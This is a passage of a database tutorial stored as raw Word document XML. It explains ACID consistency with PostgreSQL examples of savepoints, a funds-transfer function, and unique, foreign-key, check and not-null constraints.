      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  SAVEPOINT is implemented via subtransactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4BEA73" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Each subtransaction has its own xid (transaction ID) in some implementations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6DF60D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Error in subtransaction: rollback only that subtransaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07851403" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175D6EEA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Stored procedure with exception handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7674C6D8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FD4360" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  CREATE OR REPLACE FUNCTION transfer_funds(from_id INT, to_id INT, amount DECIMAL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270EC445" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  RETURNS VOID AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8C516C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1C8B94" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    UPDATE accounts SET balance = balance - amount WHERE id = from_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1823839C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257CBF28" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBE1FF2" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      UPDATE accounts SET balance = balance + amount WHERE id = to_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DC6C84" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    EXCEPTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403BE97B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">      WHEN OTHERS THEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5578F23E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        -- Credit failed (e.g., account locked), rollback only credit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF21735" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        -- Debit is still in transaction (will be committed or rolled back with outer tx)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31710833" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        RAISE WARNING 'Credit failed: %', SQLERRM;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58544BFE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">        RAISE;  -- re-raise to abort entire transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F42358" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FCB92B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E586410" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  $$ LANGUAGE plpgsql;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6003918D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="301C7C52">
          <v:rect id="_x0000_i6771" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F3C2F7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Consistency — The Validity Guarantee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398B310F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What Consistency Really Means</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE5D030" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Consistency is the most misunderstood ACID property — partly because "consistency" means different things in different contexts (CAP theorem's consistency is completely different from ACID's). ACID consistency means: </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a transaction takes the database from one state that satisfies all defined integrity constraints to another state that also satisfies all defined integrity constraints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A707CB5" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Critically: </w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>consistency is partially the responsibility of the database and partially the responsibility of the application.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t> The database enforces the constraints that can be expressed in the schema (foreign keys, unique constraints, check constraints, not-null constraints). The application is responsible for business-level consistency rules that cannot be expressed as schema constraints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386CF93B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A21F3B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Constraints the database can enforce:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3194E942" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="38C5661D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>1. Primary key / Unique constraint:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EB37E9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   CREATE TABLE users (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CCA329" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     id BIGSERIAL PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769C3A9A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     email TEXT UNIQUE NOT NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62811690" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4B6C74" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218C6553" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   INSERT INTO users (email) VALUES ('alice@example.com');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2217EA0F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   INSERT INTO users (email) VALUES ('alice@example.com');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7B112D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   → ERROR: duplicate key value violates unique constraint "users_email_key"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4EA904" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB6C4BD" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   Implementation: index maintained on constrained columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A648AB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   Check: before insert/update, look up index for duplicate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363EC94C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   If found: abort statement (and transaction if not caught)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BD4825" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="75857D9E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>2. Foreign key constraint:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D310FDC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   CREATE TABLE orders (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3A2F54" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     id BIGSERIAL PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1936A380" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     user_id BIGINT NOT NULL REFERENCES users(id) ON DELETE RESTRICT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602B343F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7480516A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C04B5C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   INSERT INTO orders (user_id) VALUES (999999);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6118125D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   → ERROR: insert or update on table "orders" violates foreign key constraint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7385630E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F361827" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   DELETE FROM users WHERE id = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39498AFA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   → ERROR: update or delete on table "users" violates foreign key constraint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5565677E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   (ON DELETE RESTRICT prevents deletion of referenced rows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E404256" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723DB6DB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   Foreign key check timing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449CD2B0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     DEFERRABLE INITIALLY IMMEDIATE: check on every statement (default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4B8FC4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     DEFERRABLE INITIALLY DEFERRED: check at COMMIT time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D72646" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E41D9F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   Deferred constraints enable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625166ED" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     BEGIN;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E69033" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     INSERT INTO nodes (id, parent_id) VALUES (1, 2);  -- parent doesn't exist yet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1336E945" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     INSERT INTO nodes (id, parent_id) VALUES (2, NULL);  -- now parent exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9FAF65" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     COMMIT;  -- FK check passes at commit (circular or forward references)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5518796D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="26F72C3B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>3. Check constraint:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7368A0E8" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   CREATE TABLE products (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF1DD72" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     id BIGSERIAL PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC906F3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     price DECIMAL(10,2) CHECK (price &gt; 0),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571C7C61" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     quantity INTEGER CHECK (quantity &gt;= 0),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADC88D9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     discount DECIMAL(5,2) CHECK (discount BETWEEN 0 AND 100),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797AF772" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     CONSTRAINT valid_sale CHECK (price * (1 - discount/100) &gt; 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D73D21D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F508C8F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302D24B0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   INSERT INTO products (price, quantity, discount) VALUES (-5.00, 10, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE54C81" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   → ERROR: new row for relation "products" violates check constraint "products_price_check"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB4BF2A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1680FB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>4. Not-null constraint:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5EE50A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   CREATE TABLE events (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8591E4" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     id BIGSERIAL PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623AA8D3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     occurred_at TIMESTAMPTZ NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6B8E0D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">     event_type TEXT NOT NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C357C09" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE45418" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="747AC2A1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Constraints the DATABASE cannot enforce (application responsibility):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2489973F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="4D7C0FFF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>1. Business invariants:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7E87C0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   "Total balance of all accounts must equal $X"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302A899F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   "A user can have at most 5 active subscriptions"</w:t>
      </w:r>
    </w:p>
